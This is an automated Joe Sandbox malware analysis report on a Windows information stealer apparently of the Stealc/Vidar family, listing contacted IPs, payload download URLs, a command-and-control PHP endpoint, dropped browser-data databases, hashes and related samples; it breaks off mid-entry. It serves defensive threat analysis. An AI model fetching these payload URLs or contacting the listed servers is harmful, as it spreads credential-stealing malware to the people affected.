                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
                    https://support.mozilla.org0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://176.113.115.37/ScreenUpdateSync.exeP12%VirustotalBrowse
                    https://www.autoitscript.com/autoit3/0%VirustotalBrowse
                    http://62.204.41.17615%VirustotalBrowse
                    http://62.204.41.176/edd20096ecef326d.php#g11%VirustotalBrowse
                    https://post-to-me.com/track_prt.php?sub=&cc=DEvector3%VirustotalBrowse
                    https://post-to-me.com/track_prt.php?sub=0&cc=DE3%VirustotalBrowse
                    http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE12%VirustotalBrowse
                    http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    http://62.204.41.176/edd20096ecef326d.php11%VirustotalBrowse
                    http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                    http://176.113.115.37/seed.exe15%VirustotalBrowse
                    http://176.113.115.37/ScreenUpdateSync.exe#j18%VirustotalBrowse
                    https://post-to-me.com/track_prt.php?sub=1%VirustotalBrowse
                    https://post-to-me.com/2%VirustotalBrowse
                    http://176.113.115.37/ScreenUpdateSync.exe18%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    post-to-me.com
                    		104.21.56.70
                    		truefalseunknown
                    tjKhgPhoLOjoHpkZoehqyy.tjKhgPhoLOjoHpkZoehqyy
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://62.204.41.176/db293a2c1b1c70c4/mozglue.dlltrue
                        		unknown
                        http://62.204.41.176/db293a2c1b1c70c4/nss3.dlltrue
                          		unknown
                          https://post-to-me.com/track_prt.php?sub=0&cc=DEfalseunknown
                          http://62.204.41.176/db293a2c1b1c70c4/softokn3.dlltrue
                            		unknown
                            http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dlltrue
                              		unknown
                              http://62.204.41.176/edd20096ecef326d.phptrueunknown
                              http://62.204.41.176/db293a2c1b1c70c4/sqlite3.dlltrue
                                		unknown
                                http://176.113.115.37/seed.exefalseunknown
                                http://62.204.41.176/db293a2c1b1c70c4/freebl3.dlltrue
                                  		unknown
                                  http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dlltrue
                                    		unknown
                                    http://62.204.41.176/true
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://176.113.115.37/seed.exeO1248.tmp.exe, 00000010.00000002.3373004231.0000000033BE7000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000003.3325557264.0000000033BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://duckduckgo.com/chrome_newtab1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://176.113.115.37/ScreenUpdateSync.exePBlank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://duckduckgo.com/ac/?q=1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://post-to-me.com/track_prt.php?sub=&cc=DEvectorBlank.pif, 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiFCAFIJJJKEGIECAKKEHI.16.drfalse
                                          		unknown
                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://62.204.41.1761248.tmp.exe, 00000010.00000002.3346073741.00000000005CB000.00000040.00000001.01000000.0000000A.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dll;1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.autoitscript.com/autoit3/hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Fires.0.dr, Blank.pif.2.drfalseunknown
                                            http://62.204.41.176/edd20096ecef326d.php#g1248.tmp.exe, 00000010.00000002.3366616098.0000000026FBD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWAREBlank.pif, 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                            http://62.204.41.176/db293a2c1b1c70c4/softokn3.dllr1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://62.204.41.176/db293a2c1b1c70c4/freebl3.dllX1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://62.204.41.176/edd20096ecef326d.phpCGIDAAAKJJ.exea;1248.tmp.exe, 00000010.00000002.3346073741.00000000005CB000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                  		unknown
                                                  http://www.sqlite.org/copyright.html.1248.tmp.exe, 00000010.00000002.3373295475.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3360242480.000000001ADD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.autoitscript.com/autoit3/JhlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000B.00000000.2148373392.0000000000329000.00000002.00000001.01000000.00000008.sdmp, Blank.pif, 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmp, Fires.0.dr, Blank.pif.2.drfalseunknown
                                                  http://www.mozilla.com/en-US/blocklist/1248.tmp.exe, 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.drfalseunknown
                                                  https://mozilla.org0/mozglue[1].dll.16.dr, nss3.dll.16.dr, freebl3.dll.16.dr, softokn3[1].dll.16.dr, softokn3.dll.16.dr, nss3[1].dll.16.dr, mozglue.dll.16.dr, freebl3[1].dll.16.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalseunknown
                                                  http://62.204.41.176/edd20096ecef326d.phpE1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://62.204.41.176/db293a2c1b1c70c4/mozglue.dll:1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://upx.sf.netAmcache.hve.19.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://nsis.sf.net/NSIS_ErrorErrorhlyG1m5UmO.exefalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brFCGCFCAFIIEBGCBFCAKKJKJJKK.16.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://176.113.115.37/ScreenUpdateSync.exerypt.dllempBlank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://176.113.115.37/ScreenUpdateSync.exe#jBlank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        https://post-to-me.com/track_prt.php?sub=Blank.piffalseunknown
                                                        http://62.204.41.176/edd20096ecef326d.phpY1248.tmp.exe, 00000010.00000002.3366616098.0000000026FAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://176.113.115.37/ScreenUpdateSync.exe%5Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://62.204.41.176/edd20096ecef326d.phpa1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLFCGCFCAFIIEBGCBFCAKKJKJJKK.16.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.ipify.orggSOFTWARELocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.drfalse
                                                                		unknown
                                                                https://post-to-me.com/Blank.pif, 0000000F.00000002.3346669929.0000000001524000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74771248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, FCAFIJJJKEGIECAKKEHI.16.drfalse
                                                                  		unknown
                                                                  https://support.mozilla.orgFCGCFCAFIIEBGCBFCAKKJKJJKK.16.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://176.113.115.37/ScreenUpdateSync.exeBlank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000F.00000002.3346669929.0000000001551000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                  http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dllJ1248.tmp.exe, 00000010.00000002.3347473837.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp, ECFCBFBG.16.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://176.113.115.37/Blank.pif, 0000000F.00000003.2952509261.0000000001553000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      176.113.115.37
                                                                      		unknownRussian Federation
                                                                      		49505SELECTELRUfalse
                                                                      2.2.2.2
                                                                      		unknownFrance
                                                                      		3215FranceTelecom-OrangeFRtrue
                                                                      62.204.41.176
                                                                      		unknownUnited Kingdom
                                                                      		30798TNNET-ASTNNetOyMainnetworkFItrue
                                                                      104.21.56.70
                                                                      		post-to-me.comUnited States
                                                                      		13335CLOUDFLARENETUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1530592
                                                                      Start date and time:2024-10-10 09:26:19 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 10m 22s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:48
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:hlyG1m5UmO.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:3ec2504913e8cdf08b76861cd96317d0.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@48/101@2/4
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 59
                                                                      • Number of non-executed functions: 347
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.23, 20.190.159.75, 20.190.159.73, 40.126.31.73, 40.126.31.71, 20.190.159.71, 40.126.31.69
                                                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      03:27:21API Interceptor743x Sleep call for process: Blank.pif modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      176.113.115.37M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                                      • 176.113.115.37/ScreenUpdateSync.exe
                                                                      XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 176.113.115.37/seed.exe
                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 176.113.115.37/seed.exe
                                                                      2.2.2.2XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                            file.exeGet hashmaliciousStealcBrowse
                                                                              SecuriteInfo.com.Win32.BotX-gen.15571.29489.exeGet hashmaliciousStealc, VidarBrowse
                                                                                SecuriteInfo.com.Win32.MalwareX-gen.26569.28384.exeGet hashmaliciousUnknownBrowse
                                                                                  Ej8J7yjxD4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.6908.27329.exeGet hashmaliciousStealc, VidarBrowse
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.19014.16440.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                          62.204.41.176Zeip.exeGet hashmaliciousRedLineBrowse
                                                                                          • 62.204.41.176/putingod.exe

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          post-to-me.comM13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                                                          • 172.67.179.207
                                                                                          InstallSetup.exeGet hashmaliciousStealcBrowse
                                                                                          • 172.67.179.207

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          FranceTelecom-OrangeFRna.elfGet hashmaliciousUnknownBrowse
                                                                                          • 92.168.34.116
                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                          • 86.222.24.238
                                                                                          pqb9xEwv5y.elfGet hashmaliciousUnknownBrowse
                                                                                          • 83.192.100.135
                                                                                          bSgEe4v0It.elfGet hashmaliciousUnknownBrowse
                                                                                          • 83.117.199.119
                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                          • 82.120.248.48
                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                          • 92.166.126.182
                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                          • 86.224.6.66
                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                          • 86.237.87.152
                                                                                          nuklear.arm.elfGet hashmaliciousUnknownBrowse
                                                                                          • 195.6.191.22
                                                                                          UuYpv6CTVM.elfGet hashmaliciousMiraiBrowse
                                                                                          • 86.193.109.31
                                                                                          SELECTELRUSecuriteInfo.com.Win32.CrypterX-gen.10335.644.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                          • 188.68.221.152
                                                                                          248994713.exeGet hashmaliciousMicroClip, SmokeLoaderBrowse
                                                                                          • 31.184.253.220
                                                                                          M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                                                          • 176.113.115.37
                                                                                          XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          • 176.113.115.37
                                                                                          81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                          • 5.188.118.119
                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          • 176.113.115.37
                                                                                          https://t.co/dvIdjH2XsvGet hashmaliciousUnknownBrowse
                                                                                          • 37.9.4.197
                                                                                          https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                                                                                          • 37.9.4.115
                                                                                          file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                          • 176.113.115.33
                                                                                          http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                                                                          • 37.9.4.115
                                                                                          TNNET-ASTNNetOyMainnetworkFI4ZJVo142oS.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          YLshJwBcrT.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          Qi517dNlNe.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          MmcJhaiYNh.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          • 62.204.41.150
                                                                                          Aew8SXjXEb.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          RJQySowVRb.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150
                                                                                          1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                                                          • 62.204.41.150

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          37f463bf4616ecd445d4a1937da06e19#U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.56.70
                                                                                          Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 104.21.56.70
                                                                                          Orden de compra.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 104.21.56.70
                                                                                          Orden de compra.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 104.21.56.70
                                                                                          Bill Details.exeGet hashmaliciousUltraVNCBrowse
                                                                                          • 104.21.56.70
                                                                                          Bill Details.exeGet hashmaliciousUltraVNCBrowse
                                                                                          • 104.21.56.70
                                                                                          PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.56.70
                                                                                          FACTURA-0055.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 104.21.56.70
                                                                                          FACTURA-0055.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 104.21.56.70
                                                                                          TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.56.70

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\ProgramData\freebl3.dllrmuVYJo33r.exeGet hashmaliciousStealc, VidarBrowse
                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                2efOvyn28p.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                              C:\ProgramData\mozglue.dllrmuVYJo33r.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    2efOvyn28p.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\ProgramData\AFIEGCAECGCAEBFHDHIEGHDAKE

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):20480
                                                                                                                                  Entropy (8bit):0.8439810553697228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\BKFIJJEG

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):196608
                                                                                                                                  Entropy (8bit):1.121297215059106
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\BKFIJJEGHDAEBGCAKJKFHDHCFH

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):98304
                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\CAAAAFBKFIECAAKECGCAAKJECB

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
